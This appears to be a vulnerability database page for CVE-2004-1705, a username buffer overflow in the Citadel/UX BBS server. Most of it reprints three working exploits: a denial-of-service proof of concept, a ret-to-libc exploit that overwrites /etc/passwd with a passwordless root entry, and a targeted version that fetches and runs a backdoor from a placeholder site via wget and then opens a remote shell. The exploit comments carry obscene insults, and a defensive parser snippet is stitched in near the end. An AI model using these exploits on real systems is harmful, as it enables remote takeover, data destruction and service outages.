CVE-2004-1705
CVSS 5.0
Published: 2004-07-30 00:00:00
Revised: 2016-10-17 22:59:30

[Original] Buffer overflow in Citadel/UX 6.23 and earlier allows remote attackers to cause a denial of service via a long username.


[CNNVD] Citadel/UX Username Buffer Overflow Vulnerability (CNNVD-200407-098)

Citadel/UX 6.23 and earlier versions contain a buffer overflow vulnerability. A remote attacker can cause a denial of service by supplying an over-long username.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:citadel:ux:5.91  Citadel Citadel_UX 5.91
cpe:/a:citadel:ux:5.90  Citadel Citadel_UX 5.90
cpe:/a:citadel:ux:6.08  Citadel Citadel_UX 6.08
cpe:/a:citadel:ux:6.07  Citadel Citadel_UX 6.07
cpe:/a:citadel:ux:6.23  Citadel Citadel_UX 6.23

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1705
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1705
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200407-098
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=109121546120575&w=2
(UNKNOWN)  BUGTRAQ  20040731 Citadel/UX Remote DoS Vulnerability
http://marc.info/?l=bugtraq&m=109146099404071&w=2
(UNKNOWN)  BUGTRAQ  20040731 Re: Citadel/UX Remote DoS Vulnerability
http://securitytracker.com/id?1010809
(VENDOR_ADVISORY)  SECTRACK  1010809
http://www.nosystem.com.ar/advisories/advisory-04.txt
(VENDOR_ADVISORY)  MISC  http://www.nosystem.com.ar/advisories/advisory-04.txt
http://www.securityfocus.com/bid/10833
(VENDOR_ADVISORY)  BID  10833
http://xforce.iss.net/xforce/xfdb/16840
(VENDOR_ADVISORY)  XF  citadel-user-dos(16840)

- Vulnerability information

Citadel/UX Username Buffer Overflow Vulnerability
Medium severity  Buffer overflow
2004-07-30 00:00:00 2006-08-28 00:00:00
Remote
Citadel/UX 6.23 and earlier versions contain a buffer overflow vulnerability. A remote attacker can cause a denial of service by supplying an over-long username.

- Advisories and patches

It is reported that the vendor has addressed this issue; the fix exists in the CVS tree. It is reported that the fix will be included in the next release of Citadel/UX; this is not confirmed.
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability information (370)

Citadel/UX Remote Denial of Service Exploit (PoC) (EDBID:370)
linux dos
2004-08-02 Verified
0 CoKi
/* citadel_dos.c
*
* Citadel/UX Remote DoS exploit (Proof of Concept)
*
* Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
*
* by CoKi <coki@nosystem.com.ar>
* No System Group - http://www.nosystem.com.ar
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define BUFFERSIZE 96+1
#define ERROR -1
#define TIMEOUT 3
#define PORT 504

int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout);
void use(char *program);

int main(int argc, char *argv[]) {
char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
int sockfd;
struct hostent *he;
struct sockaddr_in dest_dir;

if(argc != 2) use(argv[0]);

p = buffer;

printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
printf(" by CoKi <coki@nosystem.com.ar>\n\n");

memset(p, 'A', 96);
p += 92;
*p = '\0';

printf(" [+] verifying host:\t");
fflush(stdout);

if((he=gethostbyname(argv[1])) == NULL) {
herror("Error");
printf("\n");
exit(1);
}

printf("OK\n");

if((sockfd=socket(AF_INET, SOCK_STREAM, 0)) == ERROR) {
perror("Error");
printf("\n");
exit(1);
}

dest_dir.sin_family = AF_INET;
dest_dir.sin_port = htons(PORT);
dest_dir.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(dest_dir.sin_zero), 8);

printf(" [+] conecting...\t");
fflush(stdout);

if(connect_timeout(sockfd, (struct sockaddr *)&dest_dir,
sizeof(struct sockaddr), TIMEOUT) == ERROR) {

printf("Closed\n\n");
exit(1);
}

printf("OK\n");

printf(" [+] sending exploit...\t");
fflush(stdout);

recv(sockfd, temp, sizeof(temp), 0);
send(sockfd, "USER ", 5, 0);
send(sockfd, buffer, strlen(buffer), 0);
send(sockfd, "\n", 1, 0);
close(sockfd);

printf("OK\n\n");
}

int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout) {

int res, slen, flags;
struct timeval tv;
struct sockaddr_in addr;
fd_set rdf, wrf;

fcntl(sfd, F_SETFL, O_NONBLOCK);

res = connect(sfd, serv_addr, addrlen);

if (res >= 0) return res;

FD_ZERO(&rdf);
FD_ZERO(&wrf);

FD_SET(sfd, &rdf);
FD_SET(sfd, &wrf);
bzero(&tv, sizeof(tv));
tv.tv_sec = timeout;

if (select(sfd + 1, &rdf, &wrf, 0, &tv) <= 0)
return -1;

if (FD_ISSET(sfd, &wrf) || FD_ISSET(sfd, &rdf)) {
slen = sizeof(addr);
if (getpeername(sfd, (struct sockaddr*)&addr, &slen) == -1)
return -1;

flags = fcntl(sfd, F_GETFL, NULL);
fcntl(sfd, F_SETFL, flags & ~O_NONBLOCK);

return 0;
}

return -1;
}

void use(char *program) {
printf("Use: %s <host>\n", program);
exit(1);
}
---------------------------------- End Code: citadel_dos.c ----------------------------------

Compiling and running in the following manner:
coki@servidor:~$ make citadel_dos
coki@servidor:~$ ./citadel_dos localhost

Citadel/UX Remote DoS exploit (Proof of Concept)
by CoKi 

[+] verifying host: OK
[+] conecting... OK
[+] sending exploit... OK

coki@servidor:~$ 

// milw0rm.com [2004-08-02]

- Vulnerability information (424)

Citadel/UX Remote Buffer Overflow Exploit (EDBID:424)
linux remote
2004-08-30 Verified
504 Nebunu
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com
home.ro lamerz erased my nebunu@home.ro address for hosting exploits there..

Citadel/UX is a very well-known client/server messaging system for BBSes which runs on port 504 by default.
It has been discovered that it suffers from a buffer overflow when USER is sent.
The bug was discovered by CoKi, who wrote a PoC denial of service exploit.

I downloaded the source code and performed an audit. The vulnerable function lies in
user_ops.c and it is called getuser(). The legal size of a user string is only 64 characters.
When 97 characters are entered then EIP is overwritten and a DoS occurs.

The exploitation is not possible in the trivial way, because of the tolower() function that makes
ineffective any shellcode or return address.
But since I had nothing to do I decided to take a closer look..

root@nebunu local]# cd citadel
[root@nebunu citadel]# objdump -R ./citserver | grep system
08126abc R_386_JUMP_SLOT system
[root@nebunu citadel]#

So, the ret-to-libc technique is possible if the return address of system() and our command string
escape tolower(), and on many systems they do, like Slackware, FreeBSD and many others I haven't tested.

1) How to get system() address for a platform

The above is just an example on my Red Hat 9 distro. It won't work since the
system address contains a 0x42 which is B.

[root@nebunu hack]# cat sys.c

#include <stdio.h>
main()
{
system();
}
[root@nebunu hack]# gcc sys.c -o sys
[root@nebunu hack]# gdb sys
GNU gdb Red Hat Linux (5.3post-0.20021129.18rh)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...
(gdb) break main
Breakpoint 1 at 0x804832e
(gdb) r
Starting program: /root/hack/sys

Breakpoint 1, 0x0804832e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0x4203f2c0 <system> // system address here
(gdb) quit
The program is running. Exit anyway? (y or n) y
[root@nebunu hack]#

Oh, system() address and retaddr offset are supplied by hand, I refuse to
provide automated tools for kiddies.

Greetings to : rebel,R4X,Bagabontu,DrBIOS,Aziz,sorbo,(we talked once or twice on #darkircop)

*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

/*
This works only if citadel server is run as root,use your imagination
and add your own command which will provide you further acces.
Be careful what chars you use for the command,since not all chars are parsable.
*/

#define COMMAND "echo h4ck3r::0:0::/:/bin/bash >/etc/passwd;"
#define BUFFER 93
#define CITADEL_PORT 504
#define SYSADDR 0x4006be80 //for slack 9.1.0 only,change it
#define RETADDR 0xbffff000 //base for bruteforce,play with this proggie and get the right offset

int main(int argc,char **argv)
{
int i,sock,t,len,n;
char overflow[500],system[8],ret[8];
char egg[500];
int *pt;
struct sockaddr_in addy;

if(argc!=3)
{
printf("\r\nCitadel/UX remote exploit by nebunu <pppppppal at yahoo dot com>\r\nUsage: %s <target ip> <retaddr offset>\r\n",argv[0]);
exit(-1);
}

if(strlen(COMMAND)>90)
{
printf("\r\nCommand string too large\r\n");
exit(-1);
}

/* Lets build the exploit payload */

memset(overflow,0,500);
memset(egg,0,500);
memset(ret,0,8);
memset(system,0,8);
for(i=0;i<(BUFFER-strlen(COMMAND));i++)
overflow[i]='/';
strcat(overflow,COMMAND);
pt=(int *)system;
for(i=0;i<4;i+=4)*pt++=SYSADDR;
strcat(overflow,system);
strcat(overflow,"HACK");
pt=(int *)ret;
for(i=0;i<4;i+=4)*pt++=(RETADDR+atoi(argv[2]));
strcat(overflow,ret);
strcpy(egg,"USER ");
strcat(egg,overflow);
strcat(egg,"\n");
/* And send it */

sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1)
{
perror("socket()");
exit(-1);
}
addy.sin_family=AF_INET;
addy.sin_port=htons(CITADEL_PORT);
addy.sin_addr.s_addr=inet_addr(argv[1]);
t=connect(sock,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
if(t==-1)
{
perror("connect()");
exit(-1);
}
printf("\r\nConnected..OK\n");
printf("Sending exploit code..\n");
write(sock,egg,strlen(egg));
printf("Exploit sent! Now test if succesfull.\n");
}

// milw0rm.com [2004-08-30]

- Vulnerability information (437)

Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version) (EDBID:437)
linux remote
2004-09-09 Verified
504 Nebunu
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com

This is the version which contains targets,abuse it kiddies

Bruteforce:

You only have 4096/4 = 1024 tries.
The magic offset lies about 2048 + or - 4, 8, 16 .... 256.
So practically speaking you have a maximum of 256 tries.


Greetings: DrBIOS,Bagabontu,rebel,R4X and all the friends i have.

F goes to: #rosec @ undernet, www rosec info read and laugh
lacroix you are a big lamer,a little script kiddie who wants to gain fame on vortex.pulltheplug
wargame server.By the way,you pathetic cunt..have you even hacked into a box other than yours?
Mad anal fucks goes to all #rosec members,dont forget their moms.

My little private message:

Sa va bagam pule in gat celor de pe irc.apropo.ro,in special lui shell (nimeni) si toata
gasca de cacaciosi de la #rosec
Ce tupeu pe voi sa vreti donatii in e-gold..va dau eu donatii in sloboz..
*/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

/*
Place here your own link which contains a backdoor (blackhole.c) which listens on port 12345
*/

#define COMMAND "cd /tmp;wget http://your-site-here.com/a;/tmp/a;"
#define BUFFER 93            
#define CITADEL_PORT 504
#define RETADDR 0xbffff000 
#define BACKDOOR_PORT 12345
#define MAXTARGETS 9


struct architecture 
{
char *platform;     
int syst;          
}arch[]={
{"Red Hat 7.1 (Seawolf)",0x4006aef0},
{"Red Hat 7.2 (Enigma)",0x4006f664},
{"Red Hat 7.3 (Valhalla)",0x080482d0},
{"SuSE Linux 8.0",0x4006f004},
{"Debian sid unstable release",0x4005f270},
{"Slackware 8.0.0",0x40062870},
{"Slackware 9.0.0",0x40061530},
{"Slackware 9.1.0",0x4006be80},
{"SuSE Linux 8.0",0x4006f004},
};
        



void shell(int sock)
{
fd_set  fd_read;
char buff[1024000], *cmd="cd /;uname -a;id\n";
int n;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
FD_SET(0, &fd_read);
send(sock, cmd, strlen(cmd), 0);
while(1) {        
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;
if (FD_ISSET(sock, &fd_read)) 
{
if((n = recv(sock, buff, sizeof(buff), 0)) < 0)
{
fprintf(stderr, "EOF\n");
exit(2);
}
if (write(1, buff, n) > 0);
}
if (FD_ISSET(0, &fd_read)) 
{        
if((n = read(0, buff, sizeof(buff))) < 0)
{
fprintf(stderr, "EOF\n");
exit(2);
}
if (send(sock, buff, n, 0) < 0) break;
}
usleep(10);
}
fprintf(stderr, "Connection lost.\n\n");
exit(0);
}


int fuck(char *fuck)
{
struct sockaddr_in addr2;	
int sock2	= 0;
if ((sock2 = socket(AF_INET, SOCK_STREAM, 6)) < 0) 
{
return -1;
}

addr2.sin_addr.s_addr=inet_addr(fuck);
addr2.sin_family = AF_INET;
addr2.sin_port   = htons(BACKDOOR_PORT);
if(connect(sock2, (struct sockaddr *)&addr2, sizeof(addr2)) == -1) 
{
printf("\n\nExploit failed!\n\n");
return -1;
}
shell(sock2);
close(sock2);
return 0;
}

void exploit(char ip[16],int target,int tryy)
{
int i,sock,t,len,n;
char overflow[500],system[8],ret[8];
char egg[500];
int *pt;
int retaddr;
struct sockaddr_in addy;

retaddr=RETADDR+tryy;
memset(overflow,0,500);
memset(egg,0,500);
memset(ret,0,8);
memset(system,0,8);
for(i=0;i<(BUFFER-strlen(COMMAND));i++)
overflow[i]='/';
strcat(overflow,COMMAND);
pt=(int *)system;
for(i=0;i<4;i+=4)*pt++=arch[target].syst;
strcat(overflow,system);
strcat(overflow,"AAAA");
pt=(int *)ret;
for(i=0;i<4;i+=4)*pt++=retaddr;
strcat(overflow,ret);
strcpy(egg,"USER ");
strcat(egg,overflow);
strcat(egg,"\n");

sock=socket(AF_INET,SOCK_STREAM,0);
if(sock==-1)
{
perror("socket()");
exit(-1);
}
addy.sin_family=AF_INET;
addy.sin_port=htons(CITADEL_PORT);
addy.sin_addr.s_addr=inet_addr(ip);
t=connect(sock,(struct sockaddr *)&addy,sizeof(struct sockaddr_in));
if(t==-1)
{
perror("connect()");
exit(-1);
}
write(sock,egg,strlen(egg));
printf("%s\n",egg);
close(sock);
}



int main(int argc,char **argv)
{

int i,targ;
if(argc!=4)
{
printf("\r\nCitadel/UX remote exploit (private version) by nebunu <pppppppal at yahoo dot com>\r\n
Usage: %s <target ip> <target number> <offset [1..4096]>\r\n",argv[0]);
printf("\nAvailable targets:\n");
for(i=0;i<MAXTARGETS;i++)printf("\n%u) Platform %s,system=0x%x",i,arch[i].platform,arch[i].syst);
printf("\n");
exit(-1);
}


if(strlen(COMMAND)>92)
{
printf("\r\nCommand string too large\r\n");
exit(-1);
}

targ=atoi(argv[2]);
printf("\r\nAttacking %s\n",arch[targ].platform);
exploit(argv[1],targ,atoi(argv[3]));
fuck(argv[1]);

}

// milw0rm.com [2004-09-09]

- Vulnerability information

8280
Citadel/UX USER Command Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

Citadel/UX contains a flaw that may allow a remote denial of service. The issue is triggered when a user connects to port 504 on the server and sends a 'USER' command containing more than 97 bytes causing a buffer overflow. This will cause the server to crash resulting in loss of availability for the server.
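As an added defensive example (not code from the page's exploits or from the Citadel project), the following shows a bounded parser for the USER command that enforces the 64-character username limit the advisory text cites, together with a check that counts over-length USER commands in a captured session transcript. The function names, return codes and the sample transcript are constructed here, not taken from Citadel.

```c
#include <stdio.h>
#include <string.h>
#define USERNAME_MAX 64   /* legal username length cited in the advisory text */

/* Return codes of parse_user_command() (names chosen here, not Citadel's). */
enum { USER_OK = 0, USER_NOT_USER_CMD = -1, USER_TOO_LONG = -2 };

/* Parse one protocol line "USER <name>\n" into a fixed-size buffer. The flaw was
 * an unbounded copy of <name>; here the length is checked before any byte is
 * copied, so a 97-byte name is rejected instead of overrunning the stack. */
int parse_user_command(const char *line, char *out, size_t outsz)
{
    if (strncmp(line, "USER ", 5) != 0)
        return USER_NOT_USER_CMD;
    size_t len = strcspn(line + 5, "\r\n");     /* the name ends at end of line */
    if (len > USERNAME_MAX || len + 1 > outsz)
        return USER_TOO_LONG;
    memcpy(out, line + 5, len);
    out[len] = '\0';
    return USER_OK;
}

/* Monitoring helper: count USER commands whose argument exceeds the limit in a
 * session transcript (one command per line), e.g. from a proxy or pcap export. */
int count_oversized_user_commands(const char *transcript)
{
    int hits = 0;
    for (const char *p = transcript; *p; ) {
        if (strncmp(p, "USER ", 5) == 0 && strcspn(p + 5, "\r\n") > USERNAME_MAX)
            hits++;
        const char *nl = strchr(p, '\n');
        if (!nl) break;
        p = nl + 1;
    }
    return hits;
}

/* Constructed sample transcript: a normal login, then a 97-byte username. */
static const char SAMPLE_TRANSCRIPT[] =
    "USER bob\r\n" "NOOP\r\n"
    "USER " "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA"
            "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAA" "\n";

int main(void)
{
    char name[USERNAME_MAX + 1];
    printf("USER bob -> %d\n", parse_user_command("USER bob\r\n", name, sizeof name));
    printf("oversized USER commands: %d\n", count_oversized_user_commands(SAMPLE_TRANSCRIPT));
    return 0;
}
```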

- Timeline

2004-07-29 Unknown
2004-07-29 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Citadel/UX has released a patch to address this vulnerability.

- References

- Vulnerability author
